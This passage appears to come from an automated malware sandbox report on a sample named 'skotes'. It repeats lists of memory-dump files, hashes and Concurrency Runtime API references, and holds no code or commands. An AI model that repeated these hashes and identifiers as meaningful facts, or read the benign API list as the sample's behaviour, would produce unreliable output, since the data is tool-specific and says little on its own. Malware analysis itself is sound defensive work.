                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: pContext
                                                                                                                                                                                                                                              • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                              • Opcode ID: 1e0c843380a3ddb628a4d0d03b79cbab7758ca03b5931331ce4c29b44ac9fcee
                                                                                                                                                                                                                                              • Instruction ID: ccb70443aed11c3d555807e5c08ce3b69a258820b91977f531dea1c5c5bd5002
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e0c843380a3ddb628a4d0d03b79cbab7758ca03b5931331ce4c29b44ac9fcee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB213831B006159BCB14AB69D895ABCF3E5BF94338B0D422AED11876D1CB64EE42CAD0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • List.LIBCONCRT ref: 00BFAEEA
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BFAF0F
                                                                                                                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00BFAF4E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: pExecutionResource
                                                                                                                                                                                                                                              • API String ID: 1772865662-359481074
                                                                                                                                                                                                                                              • Opcode ID: ed80649d95595c9663f02a5f876191e8b4d342718ec16c477907004e4e55819c
                                                                                                                                                                                                                                              • Instruction ID: 7decdb1ee60637cfe48be204a695d68e8642349aba179d911fb27409fe115e6d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed80649d95595c9663f02a5f876191e8b4d342718ec16c477907004e4e55819c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD21B4B5A403059BCB08EF64C882BBDB7E5BF48300F104069E605AB292DBB0AE05DB95
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF4F24
                                                                                                                                                                                                                                              • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00BF4F66
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                              • API String ID: 2663199487-3650809737
                                                                                                                                                                                                                                              • Opcode ID: 9e03d2bc54281fceaf9992b4dbbdff523dda76aa626a0ead86ec8e23c4b52c44
                                                                                                                                                                                                                                              • Instruction ID: f77d3dab19445bac3834812130375be1b5e6a6a3ef3b64b0211891d0634528ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e03d2bc54281fceaf9992b4dbbdff523dda76aa626a0ead86ec8e23c4b52c44
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C21A135600219EFCB14EF59C891EBE77F5FF48310F1040A9E60697692DB71AE05CB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BFBA0E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
